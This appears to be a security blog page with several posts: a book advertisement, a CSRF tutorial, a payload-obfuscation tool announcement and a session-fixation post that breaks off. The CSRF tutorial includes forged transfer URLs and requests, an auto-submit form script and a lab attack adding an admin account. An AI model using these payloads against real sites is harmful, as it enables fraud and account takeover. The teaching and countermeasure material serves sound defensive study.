Showing posts with label XML Injection. Show all posts

28/05/2016

Hacker’s Elusive Thoughts The Web

Introduction

The reason for this blog post is to advertise my book. First of all I would like to thank all the readers of my blog for the support and feedback on making my articles better. After 12+ years in the penetration testing industry, the time has come for me to publish my book and tranfer my knowledge to all the intersted people that like hacking and want to learn as much as possible. Also at the end of the blog you will find a sample chapter.

About The Author

Gerasimos is a security consultant holding a MSc in Information Security, a CREST (CRT), a CISSP, an ITILv3, a GIAC GPEN and a GIAC GAWPT accreditation. Working alongside diverse and highly skilled teams Gerasi- mos has been involved in countless comprehensive security tests and web application secure development engagements for global web applications and network platforms, counting more than 14 years in the web application and application security architecture.

Gerasimos further progressing in his career has participated in vari- ous projects providing leadership and accountability for assigned IT security projects, security assurance activities, technical security reviews and assess- ments and conducted validations and technical security testing against pre- production systems as part of overall validations.

Where From You Can Buy The Book

This book can be bought from leanbup. Leanpub is a unique publishing platform that provides a way in the world to write, publish and sell in-progress and completed ebooks. Anyone can sign up for free and use Leanpub's writing and publishing tools to produce a book and put it up for sale in our bookstore with one click. Authors are paid a royalty of 90% minus 50 cents per transaction with no constraints: they own their work and can sell it elsewhere for any price.

Authors and publishers can also upload books they have created using their own preferred book production processes and then sell them in the Leanpub bookstore, taking advantage of our high royalty rates and our in-progress publishing features.

Please for more information about bying the book see link: https://leanpub.com/hackerselusivethoughtstheweb

Why I Wrote This Book

I wrote this book to share my knowledge with anyone that wants to learn about Web Application security, understand how to formalize a Web Appli- cation penetration test and build a Web Application penetration test team.

The main goal of the book is to:

Brainstorm you with some interesting ideas and help you build a com- prehensive penetration testing framework, which you can easily use for your specific needs. Help you understand why you need to write your own tools. Gain a better understanding of some not so well documented attack techniques.

The main goal of the book is not to:

Provide you with a tool kit to perform Web Application penetration tests. Provide you with complex attacks that you will not be able to under- stand. Provide you with up to date information on latest attacks.

Who This Book Is For

This book is written to help hacking enthusiasts to become better and stan- dardize their hacking methodologies and techniques so as to know clearly what to do and why when testing Web Applications. This book will also be very helpful to the following professionals:

1. Web Application developers.
2. Professional Penetration Testers.
3. Web Application Security Analysts.
4. Information Security professionals.
5. Hiring Application Security Managers.
6. Managing Information Security Consultants.

How This Book Is Organised

Almost all chapters are written in such a way so as to not require you to read the chapters sequentially, in order to understand the concepts presented, although it is recommended to do so. The following section is going to give you an overview of the book:

Chapter 1: Formalising Web Application Penetration Tests -

This chapter is a gentle introduction to the world of penetration testing, and attempt to give a realistic view on the current landscape. More specifically it attempt to provide you information on how to compose a Pen- etration Testing team and make the team as ecient as possible and why writing tools and choosing the proper tools is important.

Chapter 2: Scanning With Class -

The second chapter focuses on helping you understand the dierence between automated and manual scanning from the tester’s perspective. It will show you how to write custom scanning tools with the use of Python. This part of the book also contains Python chunks of code demonstrating on how to write tools and design your own scanner.

Chapter 3: Payload Management -

This chapter focuses on explaining two things a) What is a Web payload from security perspective, b) Why is it important to obfuscated your payloads.

Chapter 4: Infiltrating Corporate Networks Using XXE -

This chapter focuses on explaining how to exploit and elevate an External Entity (XXE) Injection vulnerability. The main purpose of this chapter is not to show you how to exploit an XXE vulnerability, but to broaden your mind on how you can combine multiple vulnerabilities together to infiltrate your target using an XXE vulnerability as an example.

Chapter 5: Phishing Like A Boss -

This chapter focuses on explaining how to perform phishing attacks using social engineering and Web vulnerabilities. The main purpose of this chapter is to help you broaden your mind on how to combine multiple security issues, to perform phishing attacks.

Chapter 6: SQL Injection Fuzzing For Fun And Profit -

This chapter focuses on explaining how to perform and automate SQL injection attacks through obfuscation using Python. It also explains why SQL injection attacks happen and what is the risk of having them in your web applications.

Sample Chapter Download

From the following link you will be able to download a sample chapter from my book:

Sample Book Download

26/12/2012

CSRFing the Web...

Introduction

Nowadays hacking, as already mentioned in my previous articles, has been industrialized, meaning that professional hackers are constantly hired to make money out of practically anything and therefore all Web Application vulnerabilities have to be understood and defeated.

This article is going to talk about what Cross Site Request Forgery (CSRF) is, explain how can someone perform a successful CSRF attack and describe how to amplify a CSRF attack (e.g. combine CSRF with other vulnerabilities). CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated (simplistically speaking). With a little help from social engineering (like sending a link via email/chat), an attacker may force the users of a web application to execute actions of the attacker's choosing.

A successful CSRF exploit can compromise end user data and operation in case of a normal user. If the targeted end user is the administrator account, this can compromise the entire web application. More specifically CSRF is a Web Application vulnerability that has to exploit more than one design flaws in order to be successful. The design flaws that a CSRF attack can take advantage of are:

Input Validation (e.g. Convert POST to GET)
Access Control (e.g. Session Fixation)
Privilege Assignment (e.g. Horizontal Privilege Escalation)

Note: Of course depending on the situation other type of vulnerabilities can be combined with a CSRF as part of a post exploitation process such as SQL Injection (e.g. SQL Inject the cookie and get access to valid cookie repository in the database).

History of CSRF

CSRF vulnerabilities have been known and in some cases exploited since 2001. Because it is carried out from the user's IP address, some website logs might not have evidence of CSRF. Exploits are under-reported, at least publicly, and as of 2007 there are few well-documented examples. About 18 million users of eBay's Internet Auction Co. at Auction.co.kr in Korea lost personal information in February 2008. Customers of a bank in Mexico were attacked in early 2008 with an image tag in email. The link in the image tag changed the DNS entry for the bank in their ADSL router to point to a malicious website impersonating the bank.

Severity of CSRF

According to the United States Department Of Homeland Security the most dangerous CSRF vulnerability ranks in at the 909th most dangerous software bug ever found. Other severity metrics have been issued for CSRF vulnerabilities that result in remote code execution with root privileges as well as a vulnerability that can compromise a root certificate, which will completely undermine a public key infrastructure.

But what exactly is a CSRF

CSRF is a form of confused deputy attack. Imagine you’re a malcontent who wants to harm another person in a maximum security jail. You’re probably going to have a tough time reaching that person due to your lack of proper credentials. A potentially easier approach to accomplish your misdeed is to confuse a deputy to misuse his authority to commit the dastardly act on your behalf. That’s a much more effective strategy for causing mayhem.

In the case of a CSRF attack, the confused deputy is your browser. After logging into a website, the website will issue your browser an authentication token within a cookie (well not always). Within each subsequent http POST or GET requests send, the cookie bind to the request will let the site know that you are authorized to take whatever action you’re taking. Here I am referring to a typical authentication and authorization scheme that most Web Application use.

Suppose you visit a malicious website soon after visiting your bank website or visit another website while being logged to your bank web account. Your session on the previous site might still be valid (btw please de-validate session before closing the browser). Thus, visiting a carefully crafted malicious website (perhaps you clicked on a spam link) could cause an Html form post to the previous website. Your browser would send the authentication cookie back to that site and appear to be making a request on your behalf, even though you did not intend to do so.

Yes but what is a CSRF

A CSRF is a POST or GET http request that when send to the vulnerable Web Application under certain conditions can cause the Web Application to perform an action on behalf of the user. Now meaningful CSRF attacks are those that can cause loss of Integrity or Confidentiality or Availability of the victim user data. For example if an e-Banking Web site is vulnerable to CSRF and the function of the Web Site that is vulnerable is responsible for transferring money, then this is a CSRF with high severity and should be fixed.

This is an example of a simple CSRF:

http://www.vulnerable.com/?transferEuros=3000?maliciousUserAccount=9832487

Note: The link displayed above when clicked can authorize a malicious user to transfer 3000 euros from of the victim user account to the malicious user account with id 9832487, assuming of course that no proper counter measures have been taken.

The following diagram shows how can this happen more analytically:

Note: The diagram above shows the steps an attacker can take to exploit the vulnerability (step 4 designtes the execution of the CSRF payload that performs the malicious action). It is pretty much similar to a Cross Site Script attack scenario. An attacker sends an e-mail to an Html enabled e-mail client that contains some sample images deliberately uploaded to a malicious server (controlled by the attacker), along with the malicious URL (or a malicious html form) that performs the CSRF function, waits until the user opens the e-mail and downloads the images or sets his/her e-mail to receive a notification when the victim user reads his/her e-mail. Thens he/she waits infront of the logs of the malicious image server or waits to receive a read e-mail receipt in his/her mailbox. After the image is downloaded or the read receipt is received he/she will try to verify that the malicious function was executed. Another scenario would be to calculate what times user interact with the web site and calculate the attack times before sending the malicious URL/Html form.

The diagram above explains that the CSRF (meaning the vulnerable link described previously) can be injected into an HTML enabled e-mail and be executed by a legitimate user. Now if the link (or else the CSRF vulnerable link) is bind to the Web Application session (which it should be) then the victim user would have to be logged to the vulnerable Web Application for the attack to be successful. If the link is not bind to the Web Application session then the this is not a CSRF vulnerability, is an Insecure Direct Object References vulnerability or Failure to Restrict URL Access also described by OWASP top 10 chart. Both vulnerabilities have to do with inappropriate access control and are completely irrelevant to CSRF or CSRF like vulnerabilities.

Now that you got a better grasp of what a CSRF attack is I can be more technical and explain more on how a CSRF attack look like by using http requests. So again the link described above looks as a Http request like that:

GET /homepage/transferEuros=3000?maliciousUserAccount=9832487 HTTP/1.1

Host: victim.com

Keep-Alive: timeout=15

Connection: Keep-Alive

Cookie: Authentication-Token

Accept: */*

Note: The vulnerable link when clicked will generate the GET request shown above and will, if it is successful, generate a 200 Http response message saying that the transaction was completed successfully.

Explaining more what a CSRF is

The following diagram shows thoroughly how a CSRF can be exploited:

Step 1: Mallory sends a phishing email to Bob, inviting him to visit her web server in order, for example, to win an iPhone 5. She has already created a web page at her web server with a hidden request to the Web Application where Bob is logged in. She has added some buttons to lure the victim in order to click on her page and win the iPhone!

Step 2: Bob visits the page at Mallory's Web server. Maybe he is greedy or he may not, however he clicks on the button in order to win the iPhone!...

Step 3: The forged request is "legitimized" with Bob's logged-in session and is executed at the web application.

A real-world analogy would be the following: Mallory presented a bank cheque to Bob and Bob puts under his name and signature, but haven't examined what sum of money is written on the cheque.In the following attack scenario, we can see how a malicious user can add a user to a web application just by fooling a logged-in administrator to click on a link.

A different approach to CSRF

Now that I explained a simple CSRF attack it is time to explain a more advanced scenario on how to exploit a CSRF. A CSRF most of the time is not easily recognizable and that is why lots of people cannot identify a CSRF unless it is really obvious, just like the one I just described. A CSRF issue raises when:

A Web Application performs critical functions using GET Http requests (e.g. to transfer money, add users by just clicking a link etc).
Does not distinguish between POST and GET requests (e.g. a Html form can be easily converted into a GET request, meaning that a Html POST request can be converted to a link etc).
Has a loose association or else not tight access control (e.g. does not use AntiCSRF tokens, is vulnerable to session fixation e.t.c).
Is vulnerable to Cross Site Scripting (e.g. someone can use JavaScript to formate a valid Html POST form by using the XMLHTTP object along with an auto submit script etc).
The application is passing the session to the URL along with the AntiCSRF token.
The session can be fixated and the AntiCSRF token is predictable or static.

Note: There are a lot more ways to perform a CSRF attack, but there are out of scope.

CSRF and POST to GET Interchange

It is common knowledge that when the Web Application does not distinguish between POST and GET requests an attacker can convert a POST Http request to a GET Http request and generate a link equivalent to the one described previously. Burp Suite does that automatically that from the proxy tab by right clicking the request and doing a change method (it also recalculates the Http request size in the content size field).

The attack just described is can be enhanced by using an auto submit script such as this one:

"JavaScript"> setTimeout('document.CSRFHtmlForm.submit()',5000);

Note: A very useful tool is the CSRF PoC tool also found in Burp Suite. Burp Suit CSRF PoC will generate a quick CSRF PoC for you (most of the time you would have to modify that to be realistic).

CSRF and Cross Site Scripting (XSS)

Cross-Site Scripting (XSS) attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.

An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. These scripts can even rewrite the content of the HTML page. But can also inject an Html form with an auto submit script to execute the malicious CSRF. The example is very easy to understand so I wont have to give an example.

Note1: You can see how an XSS vulnerability can be combined with a CSRF attack at the CSRF tool section (e.g. by injection also the auto submit javascript code along with the CSRF).

Note2: Of course an XSS can be combined with a CSRF attack using the XMLHTTP and auto submit javascript features. A very good XSS (XMLHTTP)/CSRF example can be found here. The specific post explains an XSS/CSRF bug found in gmail.

CSRF and Session Fixation

Session Fixation is an attack that permits an attacker to hijack a valid user session. The attack explores a limitation in the way the web application manages the session ID, more specifically the vulnerable web application. When authenticating a user, it doesn’t assign a new session ID, making it possible to use an existent session ID. The attack consists of inducing a user to authenticate himself with a known session ID, and then hijacking the user-validated session by the knowledge of the used session ID. The attacker has to provide a legitimate Web application session ID and try to make the victim's browser use it.

The session fixation attack is a class of Session Hijacking, which steals the established session between the client and the Web Server after the user logs in. Instead, the Session Fixation attack fixes an established session on the victim's browser, so the attack starts before the user logs in. There are several techniques to execute the attack; it depends on how the Web application deals with session tokens. Below are some of the most common technique:

Session token in the URL argument: The Session ID is sent to the victim in a hyperlink and the victim accesses the site through the malicious URL.

Session token in a hidden form field: In this method, the victim must be tricked to authenticate in the target Web Server, using a login form developed for the attacker. The form could be hosted in the evil web server or directly in html formatted e-mail.

Session ID in a cookie:

Client-side script:

Most browsers support the execution of client-side scripting. In this case, the aggressor could use attacks of code injection as the XSS (Cross-site scripting) attack to insert a malicious code in the hyperlink sent to the victim and fix a Session ID in its cookie. Using the function document.cookie, the browser which executes the command becomes capable of fixing values inside of the cookie that it will use to keep a session between the client and the Web Applicatio

<META> tag:

<META> tag also is considered a code injection attack, however, different from the XSS attack where undesirable scripts can be disabled, or the execution can be denied. The attack using this method becomes much more efficient because it's impossible to disable the processing of these tags in the browsers.

After describing the Session Fixation attack I will explain the attack scenario described in the picture using new chain of vulnerabilities (e.g. Session Fixation -> CSRF). An attacker sends an e-mail to an Html enabled e-mail client that contains some sample images uploaded to a malicious server, along with the malicious URL that performs the CSRF function and this time is bind to the fixed session (by using one or more of the techniques described above), waits until the user opens the e-mail and downloads the images or sets his/her e-mail to receive a notification when the victim user reads his/her e-mail. Thens he/she waits the logs of the malicious image server to be updated or waits to receive a read e-mail receipt in his/her mailbox. After the image is downloaded (and he/she sees that from e.g. /www/var/apache.logs etc) or the read receipt is received he/she will try to verify that the malicious function was executed.

The link with the fixated token will produce a GET Http request that looks like this:

GET /homepage/transferEuros=3000?maliciousUserAccount=9832487 HTTP/1.1

Host: victim.com

Keep-Alive: timeout=15

Connection: Keep-Alive

Cookie: Fixated Session

Note1: Obviously a Session Fixation attack can have devastating results even without the use of CSRF flaw. What I am saying here is that a Session Fixation combined with a CSRF attack amplifies the attack (e.g. the attacker will optimize his/her time attack frame by exploiting a chain of vulnerabilities rather than a single vulnerability).

Note2: Similar exploitation scenarios you can have when the web application does not provide the user with an authentication mechanism e.g. open registration forms used for submitting credit card details.

CSRF and bad architecture design

Although this category might not be exactly a CSRF issue, it is still very similar to a CSRF attack. This type of attack refers to the occasions were no proper random values are generated (based on user credentials) or values that are generated but do not have a session like behavior e.g. lack of authorization, none random CAPTCHA, lack of entity authentication etc. By integrating this type of behavior to your application you endanger the application to became victim to multiple type of attacks.

CSRF and Clickjaking

Clickjacking, also known as a "UI redress attack", happens is when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the the top level page. Thus, the attacker is "hijacking" clicks meant for their page and routing them to other another page, most likely owned by another application, domain, or both. Using a similar technique, keystrokes can also be hijacked. With a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing in the password to their email or bank account, but are instead typing into an invisible frame controlled by the attacker.

For example, imagine an attacker who builds a web site that has a button on it that says "click here for a free iPod". However, on top of that web page, the attacker has loaded an iframe with your vulnerable e-banking account, and lined up exactly the "transfer money" button directly on top of the "free iPod" button. The victim tries to click on the "free iPod" button but instead actually clicked on the invisible "transfer money" button. In essence, the attacker has "hijacked" the user's click, hence the name "Clickjacking". Again the attack scenario would be the similar to the ones just described above so there is no need for me to modify and explain again the attack scenarion. What is interesting though would be to show you an iframe that performs a CSRF attack.

Well an iframe that performs a CSRF attack would look something like that:

Note: You can see how beautiful this attack is and how simple and smooth can be implemented.

CSRF and Exposed Session Variables

By simply passing the session or other session variables in the URL e.g. such the AntiCSRF token, means asking for trouble. The Session Tokens (Cookie, SessionID, Hidden Field), if exposed, will usually enable an attacker to impersonate a victim and access the application illegitimately. As such, it is important that they are protected from eavesdropping at all times – particularly whilst in transit between the Client browser and the application servers.

The information here relates to how transport security applies to the transfer of sensitive Session ID data rather than data in general, and may be stricter than the caching and transport policies applied to the data served by the site. Using a personal proxy, it is possible to ascertain the following about each request and response:

Protocol used (e.g., HTTP vs. HTTPS)
HTTP Headers
Message Body (e.g., POST or page content)

Each time Session ID data is passed between the client and the server, the protocol, cache, and privacy directives and body should be examined. Transport security here refers to Session IDs passed in GET or POST requests, message bodies, or other means over valid HTTP requests. As you already understand stealing the Session ID and/or the AntiCSRF token might result in the attacker being able to form links such as the following one:

http://www.vulnerable.com/?sessionid=ligdlgkjdng?anticsrftoken=kjnsdldfksjdnk?transferEuros=3000?maliciousUserAccount=9832487

Note: The above information can be used to generate a link for a malicious user.

The attack scenario?

For my demo I choose multidae vulnerable web application which can be found on OWASP's Vulnerable Apps VM, an intercepting proxy tool (I used Portswigger's Burp Proxy, however it is not essential, just a "View Source" from any browser can work on most cases) and an Apache web server.

In the following picture you can see the main page of Multidae's web application as it can be browsed by any -non authenticated- user.

In this web application any user can register an account, but our goal is to register the account with the administrator's privileges. Below is the "register user" page that any, unauthenticated user can see.

If we view the source of the "Register Account" page, we can identify the forms (and therefore the POST request) that are being sent to the web application. That data are then processed by the application and the user is created.

Now, the attacker can create his own form at his web server and populate the HTML fields with the data of the user he wants to create on the system. (Note: no code expertise is needed in order to create this HTML page!). The following picture, you can see the HTML page that creates on his web server. He creates a user named "andrew", with password "qwerty".

Now he launches the web server (192.168.200.14) hosting this page. At this point, he needs the user's interaction. This could be accomplished, for example, by a phishing attack scenario: the victim receives an email inviting the victim to visit the attacker's page saying "click here to win an iPhone 5", or he could attach this message this "iPhone 5 message" at the page he created!

Just imagine:

And this is how it will appear on the victim's web browser:

The victim, which is at the same time logged in with this account at Multidae web application, is now tricked to click on the button and submit a register user form with the username and password set by the attacker.

Now user "andrew" can log in with the password set during the CSRF request.

At point the CSRF attack scenario is completed. We sucessfuly managed to exploit a CSRF vulnerability and add a user to the vulnerable web application.

The CASE studies for CSRF

This site here contains many popular web sites that were vulnerable to CSRF attacks. An interesting extract from the article can be found here:

"1. ING Direct (ingdirect.com)

Status: Fixed

We found a vulnerability on ING’s website that allowed additional accounts to be created on behalf of an arbitrary user. We were also able to transfer funds out of users’ bank accounts. We believe this is the first CSRF vulnerability to allow the transfer of funds from a financial institution. Specific details are described in our paper.

2. YouTube (youtube.com)

Status: Fixed

We discovered CSRF vulnerabilities in nearly every action a user could perform on YouTube. An attacker could have added videos to a user’s "Favorites," added himself to a user’s "Friend" or "Family" list, sent arbitrary messages on the user’s behalf, flagged videos as inappropriate, automatically shared a video with a user’s contacts, subscribed a user to a "channel" (a set of videos published by one person or group) and added videos to a user’s "QuickList" (a list of videos a user intends to watch at a later point). Specific details are described in our paper.

3. MetaFilter (metafilter.com)

Status: Fixed

A vulnerability existed on Metafilter that allowed an attacker to take control of a user’s account. A forged request could be used to set a user’s email address to the attacker’s address. A second forged request could then be used to activate the "Forgot Password" action, which would send the user’s password to the attacker’s email address. Specific details are described in our paper.

(MetaFilter fixed this vulnerability in less than two days. We appreciate the fact that MetaFilter contacted us to let us know the problem had been fixed.)

4. The New York Times (nytimes.com)

Status: Not Fixed. We contacted the New York Times in September, 2007. ~~As of September 24, 2008, this vulnerability still exists.~~ This problem has been fixed."

Note: You can see from the above extract that CSRF issues are very popular these days.

Tools for CSRFing the Web

The Burp Proxy tool (the Pro version of course) can be used to generate a proof-of-concept (PoC) cross-site request forgery (CSRF) attack for a given request.To access this function, select a URL or HTTP request anywhere within Burp, and choose "Generate CSRF PoC" within "Engagement tools" in the context menu.

When you execute this function, Burp shows the full request you selected in the top panel, and the generated CSRF HTML in the lower panel. The HTML uses a form with a suitable action URL, encoding type and parameters, to generate the required request when the browser submits the form.You can edit the request manually, and click the "Regenerate" button to regenerate the CSRF HTML based on the updated request.

You can test the effectiveness of the generated PoC in your browser, using the "Test in browser" button. When you select this option, Burp gives you a unique URL that you can paste into your browser (configured to use the current instance of Burp as its proxy). The resulting browser request is served by Burp with the currently displayed HTML, and you can then determine whether the PoC is effective by monitoring the resulting request(s) that are made through the Proxy.Some points should be noted regarding form encoding:

    •    Some requests (e.g. those containing raw XML or JSON) have bodies that can only be generated using a form with plain text encoding. With each type of form submission using the POST method, the browser will include a Content-Type header indicating the encoding type of the form that generated the request. In some cases, although the message body exactly matches that required for the attack request, the application may reject the request due to an unexpected Content-Type header. Such CSRF-like conditions might not be practically exploitable. Burp will display a warning in the CSRF PoC generator if this is liable to occur.

    •    If you manually select a form encoding type that cannot be used to produce the required request, Burp will generate a best effort at a PoC and will display a warning.

    •    If the CSRF PoC generator is using plain text encoding, then the request body must contain an equals character in order for Burp to generate an HTML form which results in that exact body. If the original request does not contain an equals character, then you may be able to introduce one into a suitable position in the request, without affecting the server's processing of it.

CSRF PoC Options

The following options are available:

    •    Include auto-submit script - Using this option causes Burp to include a small script in the HTML that causes a JavaScript-enabled browser to automatically submit the form (causing the CSRF request) when the page is loaded.

    •    Form encoding - This option lets you specify the type of encoding to use in the form that generates the CSRF request. The "Auto" option is generally preferred, and causes Burp to select the most appropriate encoding capable of generating the required request.

The following picture shows a screen shot from Burp CSRF PoC tool while doing right click on an intercepted request:

The following picture shows the generated CSRF PoC:

Note: Right click the intercepted Http GET or POST request and click CSRF PoC. It should not be a problem if the web application accepts POST to GET interchanges for obvious reasons.

Prevention Measures That Do NOT Work

Using a Secret Cookie:

Remember that all cookies, even the secret ones, will be submitted with every request. All authentication tokens will be submitted regardless of whether or not the end-user was tricked into submitting the request. Furthermore, session identifiers are simply used by the application container to associate the request with a specific session object. The session identifier does not verify that the end-user intended to submit the request.

Only Accepting POST Requests:

Applications can be developed to only accept POST requests for the execution of business logic. The misconception is that since the attacker cannot construct a malicious link, a CSRF attack cannot be executed. Unfortunately, this logic is incorrect. There are numerous methods in which an attacker can trick a victim into submitting a forged POST request, such as a simple form hosted in an attacker's Website with hidden values. This form can be triggered automatically by JavaScript or can be triggered by the victim who thinks the form will do something else.

Multi-Step Transactions:

Multi-Step transactions are not an adequate prevention of CSRF. As long as an attacker can predict or deduce each step of the completed transaction, then CSRF is possible.

URL Rewriting:

This might be seen as a useful CSRF prevention technique as the attacker can not guess the victim's session ID. However, the user’s credential is exposed over the URL.

CSRF countermeasures

CSRF attacks are very hard to trace and probably are not traceable unless one the two or more of the following conditions are met:

Detailed Web Application user auditing exists and is enabled.
Concurrent logins are not allowed (allowing concurrent logins would remove none repudiation).
The Web Application binds the Web Application session with the user IP (that way if the user is behind a NAT only users from the same intranet would be able to perform a CSRF attack).
AntiCSRF tokens are used per Web Application function. An AntiCSRF token in order to be effective would have to be:

Truly Random.
Bind to every Web Application function (different per Web Application function).
Behave like a session (e.g. expire after a certain time, expire e.t.c).
Use a two factor authentication per token (e.g make of a RSA token to generate the AntiCSRF to perform a transaction etc).

Other technologies for protecting against CSRF

In the web there are numerous references regarding the implementation of anti-CSRF tokens. Some examples can be found here:

Using View State to prevent CSRF attacks (example here)
OWASP CSRFGuard Project for Java
PHP CSRF Guard
.Net CSRF Guard
Anti CSRF for Joomla!

The mentality promoted by the above technologies is abvious, we should deploy a mechanism that would make unique every session initiated by the user. This can be achieved by sending the browser an anti-CSRF token that would be appended in every request the browser sends to the server. The above technique is being explained in more technical terms in OWASP's CSRF Prevention cheat sheet:

"These challenge tokens are the inserted within the HTML forms and links associated with sensitive server-side operations. When the user wishes to invoke these sensitive operations, the HTTP request should include this challenge token. It is then the responsibility of the server application to verify the existence and correctness of this token. By including a challenge token with each request, the developer has a strong control to verify that the user actually intended to submit the desired requests. Inclusion of a required security token in HTTP requests associated with sensitive business functions helps mitigate CSRF attacks as successful exploitation assumes the attacker knows the randomly generated token for the target victim's session. This is analogous to the attacker being able to guess the target victim's session identifier."

Epilogue

This blog post attempted to cover thoroughly the subject of CSRF and I believe that I managed to do that. Now there are obviously a lot more things to say about how to protect against a CSRF but for the purposes of this post is out of scope. Merry Christmas and a Happy New year.

References:

22/08/2012

The Teenage Mutant Ninja Turtles project....

Intro

Elusive Thoughts are proud to present you The Teenage Mutant Ninja Turtles project....

What Teenage Mutant Ninja Turtles is?

The Teenage Mutant Ninja Turtles project is three things:

A Web Application payload database (heavily based on fuzzdb project for now).
A Web Application error database.
A Web Application payload mutator.

Nowadays all high profile sites found in financial and telecommunication sector use filters to filter out all types of vulnerabilities such as SQL, XSS, XXE, Http Header Injection e.t.c. In this particular project I am going to provide you with a tool to generate Obfuscated Fuzzing Injection attacks on order to bypass badly implemented Web Application injection filters (e.t.c SQL Injections, XSS Injections e.t.c).

When you test a Web Application all you need is a fuzzer and ammunition:

"I saw clearly that war was upon us when I learned that my young men had been secretly buying ammunition."

Chief Joseph

Ammunition is what you use for fuzzing and the weapon is the fuzzer itself. The project called teenage-mutant-ninja-turtles is an open source payload mutator, nothing more nothing less. With teenage-mutant-ninja-turtles you will be able to generate Obfuscated payloads for testing all sorts of attacks, such as XSS, SQL Injections etc. The project is in version 1.1 and currently supports only SQL Injection fuzzing. Later on I will add support for fuzzdb and all types of attacks. Maybe later it will become a complete Web Application Scanner who knows. If you think that you are interested please contact me to participate.

Download link:http://code.google.com/p/teenage-mutant-ninja-turtles/downloads/list

The Teenage Mutant Ninja Turtles in action

The following screenshot shows the tool banner (yes it has a banner!!):

The Teenage Mutant Turtle is a Web application payload database for performing black box Web Application penetration tests (it also supports banner displaying!!!), more specifically is:

A collection of known attack patterns focused in Web Application input validation attacks (e.g. SQL Injections, XSS attacks e.t.c)
A collection of error messages produced by malicious and malformed user inputs, which you can use with Burp intruder or other grep-like utilities to identify and verify vulnerabilities when fuzzing.
An easy to use python script that helps you to obfuscate payloads for bypassing costume Web Application filters.

It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing as well as being a useful addition to an experienced pen testers arsenal toolkit.

The Teenage Mutant Ninja Turtles features

Currently Teenage Mutant Ninja Turtles (tmnt) support the following features:

Generic payload URL encoding.
Generic payload Base64 encoding.
SQL keyword case variation adding (e.g. converts SELECT to SeLeCt e.t.c).
Generic payload DE-duplication (e.g. removing double payload lines).
SQL Injection suffix adder (e.g. adding EXEC to the begging of the payload e.t.c).
SQL Injection post-fix adder (e.g. adding ); -- to the end of the payload e.t.c).

The following screenshot shows the help message of the the tool:

Epilogue

There are more features to come...

25/06/2012

Going The Same Way?

Intro

This article is about explaining the Session Fixation and Session Hijacking vulnerability impact and also do a post exploitation analysis of the methodologies used from organized crime. Many people, and by many people I mean Information Security Consultants, Security System administrators and Penetration testers tend to believe that Session Fixation/Hijacking is not so serious problem and when found in a Web Applications, when they report it they characterize it as low risk or when the Web Application is vulnerable to session fixation, they believe that when the session is not passed in the URL it cannot be used in an efficient way to attack the website.Well that is wrong, and I am sure about it because I have seen lots of my clients becoming victims from organized crime. I am also reminding you that if:

You become a Cross Site Script victim it might be difficult to detect the attack (especially if you allow concurrent logins).
You have a Session Hijacking event it is not traceable, which means that, in order to be successful the session hijacking you have to allow concurrent logins.

Well how do you protect your session fixation? Well that is easy to answer. With properly configured the server same origin policy and by not allowing concurrent logins (it is implied that you have to use random values per page, refresh the cookie after successful login and generate truly random or pseudo random but, not predictable cookies). You should also perform web user auditing and if possible feed the web user logs to an IDS/IPS device or a web application firewall. Most of the IPS/IDS devices or Web Application firewalls can understand a syslog like input, and your web or system administrator can probably do that.

The XSS/Phising Proxy Attack

When a Web Application is vulnerable to a) Session fixation attack (e.g. predictable cookie generation or no cookie refresh after login) or b) Session Stealing attack (e.g. XSS attack or Script Injection Attack e.t.c) the following conceptual representation attack scenarios are all feasible. See the following diagram:

In the diagram above you can see that initially the attacker sends an e-mail that hides either a link that forms a GET request when passed in the browser or a hidden html form or a Java script/VBScript) that forms a POST request when passed in the browser or a link that redirects the victim to the fake proxy site. Now these types of attacks are already implemented in the Social Engineering Toolkit (SET) and you can have a look if you want. The attacker can form a POST/GET request to forward the predicted/fixed or stolen session id or can use a Phi-sing site to alter the GET request sent by the victim to a POST request with a valid session.

Then if you use a single session of authentication:

If the session is predictable the attacker can hijack multiple users sessions.
If the session is stolen, but not predictable and refreshed the attacker can hijack a single user.
If the session is not stolen, not predictable and not refreshed the attacker can hijack a multiple users.

The Same origin policy

The Same Origin Policy permits scripts running on pages originating from the same site to access each other's methods and properties with no specific restrictions, but prevents access to most methods and properties across pages on different sites.

This mechanism bears a particular significance for modern web applications that extensively depend on HTTP cookies to maintain authenticated user sessions, as servers act based on the HTTP cookie information to reveal sensitive information or take state-changing actions. A strict separation between content provided by unrelated sites must be maintained on the client side to prevent the loss of data confidentiality or integrity.

History

The concept of same origin policy dates back to Netscape Navigator 2.0. Close derivatives of the original design are used in all current browsers and are often extended to define roughly compatible security boundaries for other web scripting languages, such as Adobe Flash, or for mechanisms other than direct DOM manipulation, such as XMLHttpRequest.

Origin determination rules

The term "origin" is defined using the domain name, application layer protocol, and (in most browsers) port number of the HTML document running the script. Two resources are considered to be of the same origin if and only if all these values are exactly the same.To illustrate, the following table gives an overview of typical outcomes for checks against the URL "http://www.example.com/dir/page.html".

Same-origin policy for DOM access

With no additional qualifiers, the term "same-origin policy" most commonly refers to a mechanism that governs the ability for JavaScript and other scripting languages to access DOM properties and methods across domains (reference). In essence, the model boils down to this three-step decision process:

If protocol, host name, and - for browsers other than Microsoft Internet Explorer - port number for two interacting pages match, access is granted with no further checks.
Any page may set document.domain parameter to a right-hand, fully-qualified fragment of its current host name (e.g., foo.bar.example.com may set it to example.com, but not ample.com). If two pages explicitly and mutually set their respective document.domain parameters to the same value, and the remaining same-origin checks are satisfied, access is granted.
If neither of the above conditions is satisfied, access is denied.

In theory, the model seems simple and robust enough to ensure proper separation between unrelated pages, and serve as a method for sand-boxing potentially untrusted or risky content within a particular domain; upon closer inspection, quite a few drawbacks arise, however:

